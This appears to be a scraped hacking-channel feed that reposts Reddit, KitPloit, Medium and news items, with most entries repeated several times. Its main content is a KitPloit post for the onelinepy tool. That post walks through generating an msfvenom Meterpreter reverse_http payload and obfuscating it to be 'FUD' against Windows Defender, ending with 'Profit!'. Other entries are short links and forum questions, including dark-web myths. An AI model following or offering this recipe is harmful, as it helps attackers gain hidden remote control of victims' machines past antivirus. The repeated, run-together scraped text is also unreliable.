Attacking Active Directory: 0 to 0.9
https://www.reddit.com/r/redteamsec/comments/nqvhxm/attacking_active_directory_0_to_09/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://zer1t0.gitlab.io/posts/attacking_ad/) [comments] (https://www.reddit.com/r/redteamsec/comments/nqvhxm/attacking_active_directory_0_to_09/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/nqvhxm/attacking_active_directory_0_to_09/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://zer1t0.gitlab.io/posts/attacking_ad/) [comments] (https://www.reddit.com/r/redteamsec/comments/nqvhxm/attacking_active_directory_0_to_09/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Attacking Active Directory: 0 to 0.9
Posted in r/redteamsec by u/dmchell • 6 points and 0 comments
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
http://www.kitploit.com/2021/06/onelinepy-python-obfuscator-to-generate.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/06/onelinepy-python-obfuscator-to-generate.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
Python Obfuscator To Generate One-Liners And FUD Payloads.
Download & Run
git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy
Usage Guide
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]
optional arguments:
-h, --help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
--script SCRIPT File path of Python file to Obfustucate.
--code CODE Python code to Obfustucate.
--list List Obfustucating Methods.
--output OUTPUT Output File.
Example: Creating FUD Meterpreter (https://www.kitploit.com/search/label/Meterpreter) Python Payload
Generate Python Payload: msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt Obfustucate Payload onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt Profit! The Obfustucated Payload (https://www.kitploit.com/search/label/Payload) works against Windows (https://www.kitploit.com/search/label/Windows) Defender.
More Examples
onelinepy -m /one_line/base64 --script payload.py -i 3 onelinepy -m /one_line/hex --code "print('HEX!')"
Obfustucation Method List
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhidden
Download Onelinepy (https://github.com/spicesouls/onelinepy)
___________________________
@hacking_Attack
@Hacking_Video
Download & Run
git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy
Usage Guide
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]
optional arguments:
-h, --help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
--script SCRIPT File path of Python file to Obfustucate.
--code CODE Python code to Obfustucate.
--list List Obfustucating Methods.
--output OUTPUT Output File.
Example: Creating FUD Meterpreter (https://www.kitploit.com/search/label/Meterpreter) Python Payload
Generate Python Payload: msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt Obfustucate Payload onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt Profit! The Obfustucated Payload (https://www.kitploit.com/search/label/Payload) works against Windows (https://www.kitploit.com/search/label/Windows) Defender.
More Examples
onelinepy -m /one_line/base64 --script payload.py -i 3 onelinepy -m /one_line/hex --code "print('HEX!')"
Obfustucation Method List
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhidden
Download Onelinepy (https://github.com/spicesouls/onelinepy)
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - spicesouls/onelinepy: Python Obfuscator to generate One-Liners and FUD Payloads.
Python Obfuscator to generate One-Liners and FUD Payloads. - spicesouls/onelinepy
Admin Panel? Pwned!
https://splint3rsec.medium.com/admin-panel-pwned-89db333f3836?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://splint3rsec.medium.com/admin-panel-pwned-89db333f3836?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Admin Panel? Pwned!
The unstoppable power of recon
The unstoppable power of reconContinue reading on Medium » (https://splint3rsec.medium.com/admin-panel-pwned-89db333f3836?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Admin Panel? Pwned!
The unstoppable power of recon
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Critical Zero-Day Discovered in Fancy Product Designer WordPress Plug-in
The plug-in under active attack has been installed on more than 17,000 websites, say researchers.
___________________________
@hacking_Attack
@Hacking_Video
Critical Zero-Day Discovered in Fancy Product Designer WordPress Plug-in
The plug-in under active attack has been installed on more than 17,000 websites, say researchers.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Critical Zero-Day Discovered in Fancy Product Designer WordPress Plug-in
The plug-in under active attack has been installed on more than 17,000 websites, say researchers.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
https://cdn-images-1.medium.com/max/600/1*CpRci7aZzS9dwIF5_iONMw.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
https://cdn-images-1.medium.com/max/600/1*CpRci7aZzS9dwIF5_iONMw.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
PG — InfoSecPrep— Walkthrough (Offensive Security Proving Grounds Play Boxes)
This article aims to walk you through InfoSecPrep box, produced by FalconSpy and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s Proving…
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
http://1.bp.blogspot.com/-jw8jWQoV5V0/YLbiRly2YYI/AAAAAAAAWu8/kkvvuvmhjGAJDs8U278c-vnSC2z93LVdQCK4BGAYYCw/s16000/onelinepy_1_oneline-710961.png
Python Obfuscator To Generate One-Liners And FUD Payloads.
Download & Run
Usage Guide
Example: Creating FUD Meterpreter Python Payload
1. Generate Python Payload:
1. Obfustucate Payload
1. Profit! The Obfustucated Payload works against Windows Defender.
More Examples
Obfustucation Method List
Download Onelinepy
___________________________
@hacking_Attack
@Hacking_Video
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
http://1.bp.blogspot.com/-jw8jWQoV5V0/YLbiRly2YYI/AAAAAAAAWu8/kkvvuvmhjGAJDs8U278c-vnSC2z93LVdQCK4BGAYYCw/s16000/onelinepy_1_oneline-710961.png
Python Obfuscator To Generate One-Liners And FUD Payloads.
Download & Run
git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepyUsage Guide
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]
optional arguments:
-h, --help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
--script SCRIPT File path of Python file to Obfustucate.
--code CODE Python code to Obfustucate.
--list List Obfustucating Methods.
--output OUTPUT Output File.
Example: Creating FUD Meterpreter Python Payload
1. Generate Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt1. Obfustucate Payload
onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt1. Profit! The Obfustucated Payload works against Windows Defender.
More Examples
onelinepy -m /one_line/base64 --script payload.py -i 3onelinepy -m /one_line/hex --code "print('HEX!')"Obfustucation Method List
_ _
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|
Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhiddenDownload Onelinepy
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
Deep Web
Are “living dolls” real on the dark web? Or is this another myth?
I’m a horror movie fan and I frequent horror blogs. Today one i follow uploaded an article on “living dolls” — sad human experiments supposedly come off of the dark web. He even attached some pictures - I’ll link below, to the blog - a little nsfw.
I’m in no way an expert so I thought I’d ask - are these stories/images real? Or are they more urban myths? I’m pretty freaked out, even for a horror fan, haha.
Link : https://forum.horrorstab.com/forums/argomento/il-post-di-lolita-slave-toy/
submitted by /u/thr0waway131218
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Are “living dolls” real on the dark web? Or is this another myth?
I’m a horror movie fan and I frequent horror blogs. Today one i follow uploaded an article on “living dolls” — sad human experiments supposedly come off of the dark web. He even attached some pictures - I’ll link below, to the blog - a little nsfw.
I’m in no way an expert so I thought I’d ask - are these stories/images real? Or are they more urban myths? I’m pretty freaked out, even for a horror fan, haha.
Link : https://forum.horrorstab.com/forums/argomento/il-post-di-lolita-slave-toy/
submitted by /u/thr0waway131218
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
reddit.com: over 18?
Reddit gives you the best of the internet in one place. Get a constantly updating feed of breaking news, fun stories, pics, memes, and videos just for you. Passionate about something niche? Reddit has thousands of vibrant communities with people that share…
Deep Web
red room
I’m sure everybody been hearing about this is the red room real or it’s just some myth people made ?
submitted by /u/Carefull_eater
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
red room
I’m sure everybody been hearing about this is the red room real or it’s just some myth people made ?
submitted by /u/Carefull_eater
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
red room
I’m sure everybody been hearing about this is the red room real or it’s just some myth people made ?
Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads
Python Obfuscator To Generate One-Liners And FUD Payloads.Download & Run git clone https://github.com/spicesouls/onelinepycd onelinepychmod +x setup.sh./setup.shonelinepy Usage Guide _ _ _ _ _| |_|_ _ _ _ _ | . | | -_| | | | -_| . | | | Python |_|_|_|_|_|_|_|_|_| _|_ | Obfustucator |_| |_|usage: oneline.py -h -m M -i I --script SCRIPT --code CODE --list --output OUTPUToptional arguments: -h, --help show this help message and exit -m M Obfustucating Method (i.e, -m /oneline/base64) -i I Iterations For Obfustucation. --script SCRIPT File path of Python file to Obfustucate. --code CODE Python code to Obfustucate. --list List Obfustucating Methods. --output OUTPUT Output File. Example: Creating FUD Meterpreter Python Payload Generate Python Payload: msfvenom --payload python/meterpreter\reverse_http LHOST=... LPORT=... > payload.txt Obfustucate Payload onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt Profit! The Obfustucated Payload works against Windows Defender. More Examples onelinepy -m /one_line/base64 --script payload.py -i 3 onelinepy -m /one_line/hex --code "print('HEX!')" Obfustucation Method List _ _ _ _ _| |_|_ _ _ _ _ | . | | -_| | | | -_| . | | | Python |_|_|_|_|_|_|_|_|_| _|_ | Obfustucator |_| |_| Obfustucators ( * = May cause Syntax Errors ) -=============- 0 /one_line/hex 1 /one_line/base64 2 /one_line/base32 3 /one_line/gunzip* 4 /one_line/rot13* 5 /cmd/command 6 /cmd/powershell 7 /cmd/powershellhidden Download Onelinepy
Read more...
___________________________
@hacking_Attack
@Hacking_Video
Python Obfuscator To Generate One-Liners And FUD Payloads.Download & Run git clone https://github.com/spicesouls/onelinepycd onelinepychmod +x setup.sh./setup.shonelinepy Usage Guide _ _ _ _ _| |_|_ _ _ _ _ | . | | -_| | | | -_| . | | | Python |_|_|_|_|_|_|_|_|_| _|_ | Obfustucator |_| |_|usage: oneline.py -h -m M -i I --script SCRIPT --code CODE --list --output OUTPUToptional arguments: -h, --help show this help message and exit -m M Obfustucating Method (i.e, -m /oneline/base64) -i I Iterations For Obfustucation. --script SCRIPT File path of Python file to Obfustucate. --code CODE Python code to Obfustucate. --list List Obfustucating Methods. --output OUTPUT Output File. Example: Creating FUD Meterpreter Python Payload Generate Python Payload: msfvenom --payload python/meterpreter\reverse_http LHOST=... LPORT=... > payload.txt Obfustucate Payload onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt Profit! The Obfustucated Payload works against Windows Defender. More Examples onelinepy -m /one_line/base64 --script payload.py -i 3 onelinepy -m /one_line/hex --code "print('HEX!')" Obfustucation Method List _ _ _ _ _| |_|_ _ _ _ _ | . | | -_| | | | -_| . | | | Python |_|_|_|_|_|_|_|_|_| _|_ | Obfustucator |_| |_| Obfustucators ( * = May cause Syntax Errors ) -=============- 0 /one_line/hex 1 /one_line/base64 2 /one_line/base32 3 /one_line/gunzip* 4 /one_line/rot13* 5 /cmd/command 6 /cmd/powershell 7 /cmd/powershellhidden Download Onelinepy
Read more...
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Hackaday's Satellite Communications Hack Chat
This topic seems timely. I couldn't attend, sadly. However, the transcript is available here and I plan to read it. Hopefully it's as interesting as it sounds.
submitted by /u/redrosesburningblack
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hackaday's Satellite Communications Hack Chat
This topic seems timely. I couldn't attend, sadly. However, the transcript is available here and I plan to read it. Hopefully it's as interesting as it sounds.
submitted by /u/redrosesburningblack
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hackaday's Satellite Communications Hack Chat
This topic seems timely. I couldn't attend, sadly. However, the transcript is [available here](https://hackaday.io/messages/room/2369) and I plan...
hacking: security in practice
Confinscated laptop was returned. Is it safe to open, unlock & use without restoring?
I'm not going to go into great detail about the situation but my laptop which has Ubuntu Linux installed on it with an encrypted hard-drive was confiscated by police a couple moths ago because I was a suspect in an investigation. I was cleared and my laptop returned but I'm reluctant to trust the police on anything regarding my right to privacy at this point. I'm 100% certain they weren't able to get into it and thats why it has been returned but not my phone yet. I'm not worried of them finding anything related to what they are investigating but I want to keep my privacy. Basically I'm wondering, if I power on the laptop, unlock it and start using it again, is it possible they've bugged it or something similar? Like could they have done something to it without unencrypting the hard-drive? Or am I better off just reinstalling Linux from scratch and taking the loss on my files?
submitted by /u/P1nealPower
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Confinscated laptop was returned. Is it safe to open, unlock & use without restoring?
I'm not going to go into great detail about the situation but my laptop which has Ubuntu Linux installed on it with an encrypted hard-drive was confiscated by police a couple moths ago because I was a suspect in an investigation. I was cleared and my laptop returned but I'm reluctant to trust the police on anything regarding my right to privacy at this point. I'm 100% certain they weren't able to get into it and thats why it has been returned but not my phone yet. I'm not worried of them finding anything related to what they are investigating but I want to keep my privacy. Basically I'm wondering, if I power on the laptop, unlock it and start using it again, is it possible they've bugged it or something similar? Like could they have done something to it without unencrypting the hard-drive? Or am I better off just reinstalling Linux from scratch and taking the loss on my files?
submitted by /u/P1nealPower
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Confinscated laptop was returned. Is it safe to open, unlock & use...
I'm not going to go into great detail about the situation but my laptop which has Ubuntu Linux installed on it with an encrypted hard-drive was...
hacking: security in practice
zip2john
what is the meaning of 'proceeding with incremental:ascii'?
submitted by /u/One-Ad-9971
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
zip2john
what is the meaning of 'proceeding with incremental:ascii'?
submitted by /u/One-Ad-9971
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
zip2john
what is the meaning of 'proceeding with incremental:ascii'?